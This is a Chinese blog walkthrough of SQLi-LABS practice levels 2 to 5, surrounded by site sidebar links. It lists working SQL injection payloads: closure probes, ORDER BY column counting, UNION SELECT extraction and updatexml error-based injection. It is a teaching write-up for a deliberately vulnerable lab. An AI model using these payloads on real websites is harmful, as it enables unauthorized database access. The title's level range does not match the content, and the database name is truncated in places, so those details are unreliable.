SQLi-LABS通关攻略【4~5关】

最新推荐文章于 2024-08-19 13:32:03 发布
最新推荐文章于 2024-08-19 13:32:03 发布
阅读量412 收藏 9
点赞数 3
分类专栏: SQLi-LABS通关攻略 文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_65852138/article/details/141229646
版权

SQLi-LABS 02关

1. 对网址的id进行测试,判断闭合方式

id=1  正常

id=1'  错误

id=1' --+  错误

id=1--+ 正常

该关为数字型闭合方式

 2. 判断回显位

id=1 order by 3 --+ 正常

id=1 order by 4 --+ 错误

回显位三个

 3.使用联合查询

id=-1 union select 1,2,database() --+

得出数据库名为securit

SQLi-LABS 03关

1.对网址的id进行测试,判断闭合方式

id=1  正常

id=1'  错误

id=1' --+  错误

id=1 --+ 正常

此时显示为正常,但是,在测试回显位时使用order by 50 这种离谱的语句时,它显示为正常,所以此处不是数字型。因此测试带括号的或者双引号等其他的方式

id=1') --+ 正常

所以此处是 ') 闭合方式

 2. 判断回显位

id=1') order by 3 --+ 正常

id=1') order by 4 --+ 错误

回显位三个

3. 使用联合查询

id=-1') union select 1,2,database() --+

得出数据库名为securit

 SQLi-LABS 04关

1.对网址的id进行测试,判断闭合方式

id=1' 错误

id=1' --+  错误

id=1 --+  错误

id=1" --+  错误

id=1") --+  正常

该关为字符型注入 ,闭合方式 ")

 2. 判断回显点

id=1") order by 3 --+ 正常

id=1") order by 4 --+ 错误

回显位三个

3. 使用联合查询  

id=-1") union select 1,2,database() --+

得出数据库名为securit

  SQLi-LABS 05关

1.对网址的id进行测试,判断闭合方式

id=1'   错误

id=1'--+  正常

字符型注入   闭合方式为 '

2.该关按执行效果分类为  报错注入

3. 使用报错函数updatexml(1,1,1),使用三个1占位置。

4.在报错函数中我们可以操控的参数只有第二个,所以将第二个参数替换为concat(1,1)函数

5.concat()函数中可以操控的只有最后一个,所以我们将concat()函数最后一个参数替换为select database()查询语句,进行SQL注入,得到数据库名称为security

Zhong-Xin
关注
  • 3
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
安装sqli-labs
10-22
安装完成sqli-labs靶场环境后,可以根据卡信息练习,结合write up(通关指南)和手工测试工具使用sqli-labs靶场环境。 总结 安装sqli-labs靶场环境可以提供一个安全和合法的环境来学习和实践Web应用安全。通过...
sqlilabs过手册注入天书,过sqlliabs的绝佳手册
06-28
Sqli-labs安装需要安装以下环境 apache+mysql+php Sqli-labs安装 将之前下载的源码解压到web目录下,linux的apache为 /var/www/html下,windows下的wamp解压在www目录下。 修改sql-connections/db-creds.inc文件当中...
sqlilabs过手册注入天书.pdf
09-14
"sqlilabs过手册注入天书.pdf"是SQL注入学习与实践的一份资料,主要围绕名为sqli-labs的实验室环境进行介绍和讲解。 首先,文档提到了SQL注入和sqli-labs的介绍,强调了SQL注入的危害以及学习SQL注入的重要性...
sqli-lab通关txt
07-22
在这个sqli-lab通关txt文件中,我们预计会找到一系列SQL注入攻击的实战教程,主要涵盖了从基础到进阶的10个不同阶段的练习。 SQL注入通常发生在Web应用中,当用户输入的数据没有被正确地过滤或转义,导致这些...
详细sqli-labs(1-20)通关讲解
05-18
### SQLi-Labs 1-20 卡详解 #### 第一:判断是否存在 SQL 注入 本目的是为了帮助用户了解如何判断一个网站是否存在 SQL 注入漏洞,并通过不同的输入来观察反馈信息的变化,以此来确认是否存在漏洞。 **实验...
webjs 数据库 离线读取本地数据库源码-SAAS 本地化及未来之窗行业应用跨平台架构
cybersnow精通 28 门计算机语言,凭借其超凡的技术能力,成功开发过上万个应用,广泛涉及政府、商业、个人等众多领域,甚至在检察院、环保局、公安局等专业场景中也大放异彩。不仅熟练掌握单片机和物联网开发,在软件架构设计方面更是独树一帜,自创了跨平台软件
08-15 275
【代码】webjs 数据库 离线读取本地数据库源码-SAAS 本地化及未来之窗行业应用跨平台架构。
linux安装达梦数据库
最新发布
HAN_789的博客
08-19 117
如果无法创建dmdba 文件夹,需要进入root用户下 在管理员用户下,这种安装方式一般只用于验证,开发,测试,生产最好还是安装传统的方式安装。在 home/dmdba/dmdbms/bin 目录下执行。(1)将文件上传到 /home/dmdba/ 目录下。(2)加压:tar -xzvf dmdb.tar.gz。进入到root就可以创建dmdba 文件夹了。1、后台启动,一般建议用后台启动。
网上商品订单转手系统bootpf
weixin_43213064的博客
08-18 463
【代码】springboot网上商品订单转手系统bootpf
mysql介绍
weixin_57763462的博客
08-14 405
丰富的存储引擎:MySQL 提供了多种存储引擎,如 InnoDB、MyISAM、Memory 等,每种存储引擎都有其特定的应用场景和优势。多语言支持:MySQL 支持多种编程语言,包括 C、C++、Python、Java、Perl、PHP 等,并提供了相应的 API。安全性:MySQL 提供了灵活的权限和密码系统,支持基于主机的验证,并且所有的密码传输都采用加密形式,确保了数据的安全性。管理工具:MySQL 提供了丰富的管理工具,如命令行客户端、图形界面管理工具等,方便用户进行数据库的管理和维护。
旅游网站
weixin_43213064的博客
08-16 1109
【代码】springboot旅游网站
【Python使用】嘿马头条项目从到完整开发教程第1篇:简介,1. 内容【附代码文档】
一诺的博客
08-16 630
本教程的知识点为:简介 1. 内容 2. 目标 产品效果 ToutiaoWeb虚拟机使用说明 数据库 理解ORM 作用 思考: 使用ORM的方式选择 数据库 SQLAlchemy操作 1 新增 2 查询 all() 数据库 分布式ID 1 方案选择 2 头条 使用雪花算法 (代码 toutiao-backend/common/utils/snowflake) 数据库 Redis 1 Redis事务 基本事务指令 Python客户端操作 Git工用流 调试方法 JWT认证方案 JWT & JWS & JWE
[PHP]-Laravel中Group By引发的问题思考
hmx224_2014的专栏
08-16 507
Laravel 和 ThinkPHP 是两个不同的 PHP 框架,它们在底层使用了相同的 SQL 查询语言来与数据库交互。然而,由于框架的设计和实现方式不同,它们在生成 SQL 查询时可能会表现出一些细微的差异,包括对GROUP BY 子句的处理。在调用查询公司在线报告接口时,发现我请求的数据室20条每页,但是经查询存在16,17条的都有,并且后几页也不稳定,就一直查询问题。
企业架构MySQL读写分离
A1357924680_的博客
08-16 835
DAU : 2000 (每日活跃⽤户数) 之前业务中是单台 MySQL 提供服务,使用多台MySQL数据库务器,降低单台压力,实现集群架构的稳定性和高可用性 数据的一致性 完整性 replication通过业务比对和分析发现,随着活跃用户数增多,读取数据的请求变多,故着重解决读取数据的压力。基于主从复制的基础上,常见的数据库负载均衡使用的是读写分离方式。在业务代码中,数据库的操作,不直接连接数据库,而是先请求到中间件服务器(代理)由代理服务器,判断是读操作去从数据服务器,写操作去主数据服务器。
实训day21
2201_75673097的博客
08-17 821
uid=997(mysql) gid=994(mysql) 组=994(mysql)2、为root账户刷新权限。
SAP Memory & ABAP Memory超级详细解析
qq_53645728的博客
08-18 1062
该语句将使用 EXPORT 语句写入数据库表 dbtab 的数据集群的所有数据对象的内容表传递给内部表 itab,数据库表 dbtab 的 ID 位于 id 中指定的区域 ar 中。它们还定义了适当的转换规则。规则扩展的目的是,在结构类型相同的情况下,如果最高级别的源结构比数据簇中的目标结构有更多的组件,则多余的组件将被删除。允许使用以下值: F “表示基本的平面数据对象,”G “表示字符串,”R “表示平面结构,”S “表示深层结构,”T “表示具有平面行类型的内部表,”C "表示具有深层行类型的表。
17.session不共享问题
卷土的博客
08-16 214
多台Tomcat并不共享session存储空间,当请求切换到不同的tomcat服务时导致数据丢失问题。考虑到以后微服务部署多个项目,也就是多个tomcat就会出现session不共享问题。
Pydantic serialisation 结合 tortoise-orm 使用文档
????Fender的博客????
08-16 1156
Pydantic serialisation 结合 tortoise-orm 使用文档
基于vue框架的爱看电影网站v4o92(程序+源码+数据库+调试部署+开发环境)系统界面在最后面。
h2345678的博客
08-15 1019
项目功能:用户,电影分类,电影信息,电影评分基于Vue框架的爱看电影网站项目功能丰富多样,旨在为用户提供一个集电影浏览、信息查询、观影体验、互动交流于一体的综合性平台。
2024年8月16日(运维自动化 ansible)
weixin_70751333的博客
08-16 1012
group01][group02]},},},[root@m0 ~]# ansible group02 -m ping #192.168.8.183没有免密,报错[root@m0 ~]# vim /etc/ansible/hosts #重新修改文件[group01][group02]other[root@m0 ~]# ansible group02 -m ping #不报错了[root@m0 ~]# ansible other -m ping #单独也是成功的},
sqli-labs通关1-5
09-03
sqli-labs通关5通关5的方法没有在提供的引用中找到相信息。 请注意,为了安全起见,在进行实际操作时,请确保仅在合法和授权的环境中进行,并遵守法律和道德规范。<span class="em">1</span><span class=...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值